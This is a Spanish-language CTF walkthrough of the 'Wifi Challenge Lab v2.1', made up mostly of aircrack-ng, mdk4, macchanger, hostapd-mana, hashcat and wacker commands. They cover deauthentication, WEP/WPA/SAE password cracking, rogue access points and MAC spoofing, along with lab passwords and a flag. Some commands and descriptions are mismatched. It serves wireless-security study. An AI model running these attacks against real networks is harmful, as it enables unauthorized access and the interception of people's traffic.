← Volver al índice Pez Ejecutivo

Apuntes de Wifi

Apuntes creados por Pablo Valladares González.

Wifi Challenge Lab v2.1

00. What is the contents of the file /root/flag.txt on the VM?

Los comandos utilizados han sido:

cat: Comando para leer archivos

cat /root/flag.txt

01. What is the channel that the wifi-global Access Point is currently using?

Los comandos utilizados han sido:

airmon-ng start wlan0: Pone la interfaz de red (wlan0) en modo promiscuo/monitor

airodump-ng wlan0mon --band abg: Captura/Muestra el trafico de todas las wifis cercanas incluidas las de 5GHz

airmong-ng start wlan0
airodump-ng wlan0mon --band abg

02. What is the MAC of the wifi-IT client? using?

Los comandos utilizados han sido:

airodump-ng wlan0mon --channel 11: Captura/Muestra el trafico de las redes en los canales 11

airodump-ng wlan0mon --channel 11

03. What is the probe of 78:C1:A7:BF:72:46?

Los comandos utilizados han sido:

airodump-ng wlan0mon --band abg: Captura/Muestra el trafico de las redes en las bandas de 2,4GHz y 5GHz

airodump-ng wlan0mon --band abg

04. What is the ESSID of the hidden AP (mac F0:9F:C2:6A:88:26)?

Los comandos utilizados han sido:

sed -i 's/\b\w\+/wifi-&/g' rockyouModificado.txt Para añadir "wifi-" al principio de cada palabra

iwconfig wlan0mon channel 11: Cambia el canal de la interfaz de red (wlan0mon) al canal 11

mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f rockyoumodificado.txt: Consigue el nombre del wifi con dicha MAC (F0:9F:C2:6A:88:26) a partir de la lista (rockyoumodificado.txt)

sed -i 's/\b\w\+/wifi-&/g' rockyouModificado.txt
iwconfig wlan0mon channel 11
mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f rockyoumodificado.txt

05. What is the flag in the hidden AP router behind default credentials?

Los comandos utilizados han sido:

nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene

network={
    ssid="wifi-free"
    key_mgmt=NONE
    scan_ssid=1
}

wpa_supplicant -Dnl80211 -iwlan1 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)

dhclient wlan1 -v: Para obtener una IP en dicha interfaz (wlan1)

wpa_supplicant -Dnl80211 -iwlan1 -c wifi-free.conf
dhclient wlan1 -v                                

06. What is the flag on the AP router of the wifi-guest network?

Los comandos utilizados han sido:

ip link set wlan2 down: Para apagar dicha interfaz (wlan2)

macchanger -m MAC wlan2: Para cambiar la MAC a la interfaz (wlan2) apagada

ip link set wlan2 up: Para encender dicha interfaz (wlan2)

nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene

network={
    ssid="wifi-guest"
    key_mgmt=NONE
    scan_ssid=1
}

Necesitaremos tener una captura de la red, donde podamos filtrar por el puerto 80 para sacar las credenciales

wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)

dhclient wlan2 -v: Para obtener una IP en dicha interfaz (wlan2)

wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf
dhclient wlan1 -v

07. What is the flag on the wifi-old AP website?

Los comandos utilizados han sido:

besside-ng -b MAC wlan0mon: Para conseguir la contraseña del wifi de dicha MAC

nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene

network={
    ssid="wifi-old"
    key_mgmt=NONE
	wep_key0=11bb33cd55
	wep_tx_keyidx=0
}

wpa_supplicant -Dnl80211 -iwlan3 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)

dhclient wlan3 -v: Para obtener una IP en dicha interfaz (wlan3)

wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf
dhclient wlan1 -v

08. What is the wifi-mobile AP password?

Los comandos utilizados han sido:

airodump-ng wlan0mon -c 6 --wps -w scan8: Captura/Muestra el trafico de las redes en el canal 6 y lo guarda en archivos llamados scan8.

aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon: Hace un ataque de Deauth 10 veces para obtener la contraseña de cuando se conecten, es importante hacer esto mientras se esta realizando la captura.

aircrack-ng scan8-01.cap -w /root/rockyou-top100000.txt: Conseguimos la contraseña del wifi mediante la captura anteriomente conseguida y una lista de palabras

airodump-ng wlan0mon -c 6 --wps -w scan8
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon
aircrack-ng scan8-01.cap -w /root/rockyou-top100000.txt

09. What is the IP of the web server in the wifi-mobile network?

Los comandos utilizados han sido:

airodump-ng wlan0mon -c 6 --wps -w scan9: Captura/Muestra el trafico de las redes en el canal 6 y lo guarda en archivos llamados scan9.

aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon: Hace que se desconecte la gente para poder capturar los paquetes de login

airdecap-ng -e wifi-mobile -p starwars1 scan9-01.cap: Captura y desencripta el trafico wifi a la vez, utilizando la contraseña y ssid introducido (starwars1, wifi-mobile)

wireshark scan9-01-dec.cap: Abrimos la captura de trafico con wireshark

airodump-ng wlan0mon -c 6 --wps -w scan9
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon

airdecap-ng -e wifi-mobile -p starwars1 scan9-01.cap
wireshark  scan9-01-dec.cap

En wireshark buscaremos todas las peeticiones que tengan como destino puerto 80, ya que el servidor web se aloja en el puerto 80 de manera habitual.

10. what is the flag after login in wifi-mobile?

Los comandos utilizados han sido:

airodump-ng wlan0mon -c 6 --wps -w scan10: Captura/Muestra el trafico de las redes en el canal 6 y lo guarda en archivos llamados scan10.

aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon: Captura y desencripta el trafico wifi a la vez, utilizando la contraseña y ssid introducido (starwars1, wifi-mobile)

aircrack-ng scan10-01.cap -w /root/rockyou-top100000.txt: Obtenemos la contraseña de dicha red

airdecap-ng -e wifi-mobile -p starwars1 scan10-01.cap: Abrimos la captura de trafico con wireshark

nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene

network={
    ssid="wifi-mobile"
    psk="starwars1"
    key_mgmt=WPA-PSK
    proto=WPA2
}

wpa_supplicant -Dnl80211 -iwlan4 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)

dhclient wlan4 -v: Para obtener una IP en dicha interfaz (wlan3)

wireshark scan10-01-dec.cap

airodump-ng wlan0mon -c 6 --wps -w scan10
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon
aircrack-ng scan10-01.cap -w /root/rockyou-top100000.txt
airdecap-ng -e wifi-mobile -p starwars1 scan10-01.cap
nano wifi.conf
wpa_supplicant -Dnl80211 -iwlan4 -c wifi.conf
dhclient wlan4 -v
wireshark  scan9-01-dec.cap

En wireshark buscaremos todas las peticiones que tengan como destino puerto 80, ya que el servidor web se aloja en el puerto 80 de manera habitual.

11. Is there client isolation in the wifi-mobile network?

Los comandos utilizados han sido:

arp-scan -I wlan4 -l: detecta dispositivos en la red

curl 192.168.2.7: manda una petición get a dicha IP

arp-scan -I wlan4 -l
curl 192.168.2.7

12. What is the wifi-offices password?

Lo primero que deberemos de hacer es crear un archivo host.conf (el nombre puede ser diferente), el cual contenga el siguiente contenido

interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=wifi-offices
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

hostapd-mana host.conf: Simula dicho punto de acceso para que se realicen las conexiones a nosotros

cat hostapd.hccapx | awk {'print $3'} > hostapd.22000: Arregla el formato del archivo para poder usar hashcat

hashcat -a 0 -m 22000 hostapd.22000 ~/rockyou-top100000.txt --force: Crackea los hashes para obtener la contraseña

13. What is the flag on the wifi-management AP website?

./wacker.py --wordlist ~/rockyou-top100000.txt --ssid wifi-management -- bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462: Ademas de suplantar la identidad del punto de acceso, crackea la contraseña

Crearemos un archivo de wifi.conf

network={ 
    ssid="wifi-management" 
    psk="chocolate1" 
    key_mgmt=SAE 
    scan_ssid=1 
    ieee80211w=2 
}

wpa_supplicant -Dnl80211 -iwlan1 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)

dhclient wlan1 -v: Para obtener una IP en dicha interfaz (wlan1)

Con esto entraremos a la IP 192.168.14.1 y obtendremos la flag

14. What is the flag on the wifi-IT AP website?

Crearemos otro archivo host.conf

interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=hostapd-it.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

Importante hacer el hostapd-mana y el aireplay-ng a la vez, ya que si no, no funcionara

hostapd-mana hostapd-sae.conf: Simulamos el punto de acceso

iwconfig wlan0mon channel 11: Cambiamos la interfaz de canal para poder usar herramientas

aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25 -c 10:F9:6F:AC:53:52: Mandamos un ataque de deauth para que se conecten a nuestro punto de acceso simulado

cat hostapd.hccapx | awk {'print $3'} > hostapd.22000: Formateamos correctamente el archivo de los hashes

hashcat -a 0 -m 22000 hostapd.22000 ~/rockyou-top100000.txt --force: Crackeamos los hashes para obtener la contraseña

Crearemos el archivo wifi.conf con el siguiente contenido

network={ 
    ssid="wifi-IT" 
    bssid=F0:9F:C2:1A:CA:25 
    psk="bubblegum" 
    key_mgmt=SAE 
    scan_ssid=1 
    ieee80211w=0 
}

wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan2)

dhclient wlan2 -v: Para obtener una IP en dicha interfaz (wlan2)

Con esto entraremos a la IP 192.168.15.1 y obtendremos la flag

En progreso...

Agradecemos su espera

flag{60223747c5360c8d3203917998f37d28}

Advertencia

Esta página no promueve o incita a cometer ninguna acción ilegal, todo el contenido proporcionado está diseñado para ser solamente educativo.